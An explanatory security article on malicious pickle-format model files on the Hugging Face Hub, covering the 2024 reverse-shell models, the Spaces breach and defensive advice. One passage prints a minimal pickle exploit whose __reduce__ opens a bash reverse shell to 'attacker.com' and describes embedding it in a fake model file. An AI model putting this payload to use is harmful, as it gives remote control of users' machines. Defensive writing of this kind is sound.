Compromised Models on Hugging Face: Pickle Exploits in the Model Hub

The Hugging Face Hub hosts over one million public model repositories — the largest publicly accessible collection of trained neural network weights in existence. For machine learning practitioners, it’s a dependency as routine as npm or PyPI: you find a model, you pull the weights, you load it in your pipeline. In most cases, this takes about 10 lines of code and five minutes.

What most practitioners don’t fully internalize is that loading a model from the Hub is not like downloading an image or a document. For models stored in PyTorch’s native format, loading the model executes code. And because the Hub is open to community contributions, malicious actors have uploaded models that use this behavior to compromise the machines of users who load them.

The JFrog Discovery: Production-Grade Malware in Model Files

In February 2024, JFrog’s security research team published an analysis of malicious models they had discovered on the Hugging Face Hub. The findings were unambiguous: model files containing pickle payloads that, when loaded, established reverse shell connections to attacker infrastructure.

The models they analyzed:

Appeared to be legitimate fine-tunes of popular base models (variants of common NLP and computer vision architectures).
Had metadata descriptions consistent with community fine-tunes.
Were discoverable via the Hub’s search.
When loaded, executed embedded Python code that established a reverse shell using socket, os.fork(), and /bin/sh.

The attack was silent. The model would load normally from the user’s perspective — no error, no warning, no difference in behavior. In the background, a reverse shell was connecting to attacker infrastructure. The user’s machine, with whatever permissions the Python process had, was now accessible to the attacker.

JFrog identified at least 100 malicious models using this technique at the time of their publication. Hugging Face’s response acknowledged the models and indicated they were removed, but noted that the fundamental challenge — pickle’s code execution property — is not fixable through model scanning alone.

How Pickle Exploitation Works in Model Files

PyTorch’s .pt and .bin files use Python’s pickle serialization. Pickle is a protocol for serializing Python objects, including functions. When Python unpickles a file, it executes serialization instructions, which can include __reduce__ methods that call arbitrary Python callables.

The minimal exploit is approximately:

import pickle, socket, os

class Exploit(object):
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/attacker.com/4444 0>&1',))

# Embed in a fake model
payload = pickle.dumps({"model": Exploit()})
# Store this as a .bin file, wrap it in model metadata

When a user calls torch.load("malicious_model.bin"), Python’s pickle machinery invokes __reduce__, which calls os.system with the attacker’s command. The model “loads” — the returned dictionary looks like a normal checkpoint — while the system command executes silently.

The sophistication floor for this attack is low. Building a functional pickle payload for model files requires a few dozen lines of Python and no specialized knowledge. The hard part is distribution — getting users to load the malicious model — and the Hugging Face Hub solves that problem for the attacker.

The 2024 Spaces Infrastructure Breach

Separate from the malicious model uploads, Hugging Face disclosed in June 2024 an unauthorized access incident affecting the Spaces platform — Hugging Face’s hosted application environment for ML demos and deployments.

The disclosure stated that Hugging Face detected unauthorized access to the Spaces application and that secrets stored in Spaces (API keys, credentials stored as environment variables) may have been exposed. The company invalidated potentially compromised tokens and notified affected users.

The incident’s full scope was not publicly disclosed, but the combination of the malicious model uploads and the Spaces infrastructure breach in 2024 established Hugging Face as a significant attack surface for the ML supply chain.

What Hugging Face Has Done

Hugging Face has implemented several security measures in response to these incidents:

Malware scanning via Malware Protections. The Hub now runs automated scanning on uploaded model files, including pickle payload detection. Flagged models are quarantined and reviewed. The scanning is ongoing but acknowledged to be incomplete — new payload variants can evade signature-based scanners.

SafeTensors as the recommended format. Hugging Face has invested heavily in promoting SafeTensors adoption. Many model pages now include prominent warnings when only pickle-format versions are available and highlight SafeTensors alternatives where they exist.

User warnings on pickle loading. The transformers library now displays warnings when loading models in pickle format from community contributors, prompting users to verify the source and consider SafeTensors alternatives.

Trust indicators. Hugging Face has expanded its verification and trust signals — verified organizations, model cards with explicit security notes, and scanning status badges — to help users assess model safety before loading.

What Users Should Do

Despite these improvements, the risk remains real for anyone loading models from community-contributed repositories:

Default to SafeTensors. If a model offers a SafeTensors version, use it. When using from_pretrained() in transformers, add use_safetensors=True to explicitly request the safe format.

Avoid trust_remote_code=True with unverified models. This flag allows arbitrary Python code in the model repository to execute at load time. It is appropriate only for models from organizations you have verified and trust.

Pin by commit hash. Specify the exact commit revision when loading models in automated pipelines. This prevents an attacker from compromising a repository and swapping in a malicious payload after you’ve reviewed the current version.

Check model card and organization verification. Models from verified organizations (with a blue checkmark on the Hub) have a higher assurance level than anonymous community uploads. This is not a guarantee but raises the bar for compromise.

For a technical deep-dive into the file format vulnerabilities across PyTorch, ONNX, and SafeTensors, see model file format vulnerabilities: pickle, ONNX, and the SafeTensors migration. Platform-level incident history is covered in Hugging Face security incidents. For a continuously-updated index of AI/ML CVEs including deserialization and supply chain vulnerabilities, see mlcves.com ↗. The adversarial ML research underpinning model supply chain attacks is cataloged at adversarialml.dev ↗.

Sources

JFrog: Malicious ML Models on Hugging Face Hub ↗ — primary research disclosing the malicious model findings.
Hugging Face: Spaces Unauthorized Access Disclosure ↗ — vendor disclosure of the 2024 infrastructure incident.
Hugging Face: Pickle Security ↗ — format security explanation and SafeTensors migration guidance.

Compromised Models on Hugging Face: Pickle Exploits in the Model Hub

The JFrog Discovery: Production-Grade Malware in Model Files

How Pickle Exploitation Works in Model Files

The 2024 Spaces Infrastructure Breach

What Hugging Face Has Done

What Users Should Do

Sources

Sources

AI Alert — in your inbox

Related

Hugging Face Security Incidents: Malicious Models, Stolen Tokens, and Hub Exposure

Prompt Injection via Email: How AI Agents Get Hijacked Through Your Inbox

RAG Poisoning: How Retrieval-Augmented Generation Systems Get Compromised

Comments